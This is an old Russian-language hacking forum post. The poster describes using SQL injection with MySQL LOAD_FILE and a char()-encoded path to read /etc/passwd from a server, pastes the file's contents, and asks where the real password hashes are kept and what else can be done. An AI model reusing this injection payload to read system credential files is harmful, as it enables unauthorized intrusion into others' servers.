13.11.2007, 02:24
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
где лежат пароли?
Здравствуйте! 
По SQL injection FAQ и ещё одному FAQ вытащил файл '/etc/passwd' через LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119 ,100)), а в нем НЕТ НИ ОДНОГО пароля!
Имеет вид:
Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin SSH:/var/empty/sshd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin trasfert:x:500:500::/home/trasfert:/bin/bash ftpdumprm:x:501:501::/home/ftpdumprm:/bin/bash
Пароль root есть в MySQL хеше, подбирается, но вероятность не велика ))
Подскажите, с этими данными что-нибудь можно сделать? Где нормальный файл с паролями может лежать?
Спасибо! |
|
|